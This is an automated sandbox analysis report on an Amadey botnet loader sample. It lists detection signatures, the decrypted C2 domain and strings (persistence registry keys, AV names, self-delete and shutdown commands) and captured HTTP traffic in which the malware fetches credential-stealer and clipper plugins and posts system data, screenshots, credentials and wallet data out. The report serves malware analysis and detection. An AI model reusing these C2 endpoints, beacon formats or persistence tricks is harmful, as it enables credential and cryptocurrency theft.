Windows Analysis Report
c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe

Overview

General Information

Sample name: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe
Analysis ID: 1427773
MD5: f6ee2a295cd2ba584f9a363ade3d55b3
SHA1: c6966445c9adf9a0afe1a62b91d1e4f75c5ac55c
SHA256: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e725afb702ec29e705d1f3
Tags: Amadey, exe

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Avira: detected
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack Malware Configuration Extractor: Amadey {"C2 url": "topgamecheats.dev/8bjndDcoA3/index.php", "Version": "4.19"}
Source: topgamecheats.dev Virustotal: Detection: 23%
Source: http://topgamecheats.dev/8bjndDcoA3/index.php?wal=1 Virustotal: Detection: 22%
Source: http://topgamecheats.dev/8bjndDcoA3/Plugins/clip64.dll Virustotal: Detection: 23%
Source: http://topgamecheats.dev/8bjndDcoA3/index.phpd Virustotal: Detection: 22%
Source: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dll Virustotal: Detection: 23%
Source: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1 Virustotal: Detection: 22%
Source: topgamecheats.dev/8bjndDcoA3/index.php Virustotal: Detection: 22%
Source: http://topgamecheats.dev/8bjndDcoA3/index.php Virustotal: Detection: 22%
Source: http://topgamecheats.dev/8bjndDcoA3/index.phpm Virustotal: Detection: 22%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Virustotal: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Virustotal: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Virustotal: Detection: 77%
Source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll Virustotal: Detection: 46%
Source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll Virustotal: Detection: 42%
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe ReversingLabs: Detection: 78%
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Virustotal: Detection: 77%
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Joe Sandbox ML: detected
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: topgamecheats.dev
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: /8bjndDcoA3/index.php
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: S-%lu-
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: cbb1d94791
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Dctooux.exe
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Startup
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: cmd /C RMDIR /s/q
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: rundll32
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Programs
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: %USERPROFILE%
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: cred.dll|clip.dll|
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: http://
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: https://
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: /Plugins/
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: &unit=
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: shell32.dll
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: kernel32.dll
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: GetNativeSystemInfo
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ProgramData\
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: AVAST Software
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Kaspersky Lab
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Panda Security
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Doctor Web
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: 360TotalSecurity
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Bitdefender
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Norton
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Sophos
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Comodo
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: WinDefender
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: 0123456789
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ------
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ?scr=1
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ComputerName
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: -unicode-
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: VideoID
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: DefaultSettings.XResolution
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: DefaultSettings.YResolution
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ProductName
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: CurrentBuild
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: rundll32.exe
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: "taskkill /f /im "
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: " && timeout 1 && del
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: && Exit"
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: " && ren
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: Powershell.exe
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: shutdown -s -t 0
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: random
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ~L$v(g
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: ~L$v(g
Source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack String decryptor: 7FKeuO

Compliance

Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Unpacked PE file: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Unpacked PE file: 20.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Unpacked PE file: 28.2.Dctooux.exe.400000.0.unpack
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.28.dr, cred64[1].dll.28.dr
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_c92ec1cea5a09af2_e07fb967fe61390ff947874da9a18efae6cac7_8e61c4a5_95ca67f7-278d-440f-920c-862f52c2b333\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_c92ec1cea5a09af2_f9165ae4ce682ce742d9caa30eddae375d89b91_8e61c4a5_199673d7-74d3-4533-ae8f-04d3f7d3cc65\

Networking

Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49746 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49748 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49751 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49752 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49755 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49762 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49765 -> 93.123.39.96:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49783 -> 93.123.39.96:80
Source: Malware configuration extractor URLs: topgamecheats.dev/8bjndDcoA3/index.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | content-type: application/octet-stream | last-modified: Fri, 12 Apr 2024 22:39:08 GMT | etag: "6619b80c-139c00" | accept-ranges: bytes | content-length: 1285120 | date: Thu, 18 Apr 2024 04:53:14 GMT | server: LiteSpeed | connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | content-type: application/octet-stream | last-modified: Fri, 12 Apr 2024 22:39:08 GMT | etag: "6619b80c-1b600" | accept-ranges: bytes | content-length: 112128 | date: Thu, 18 Apr 2024 04:53:18 GMT | server: LiteSpeed | connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/cred64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/clip64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYxMA==Host: topgamecheats.devContent-Length: 4770Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODUzMDM= Host: topgamecheats.dev Content-Length: 85455 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTAwMzE= Host: topgamecheats.dev Content-Length: 90183 Cache-Control: no-cache
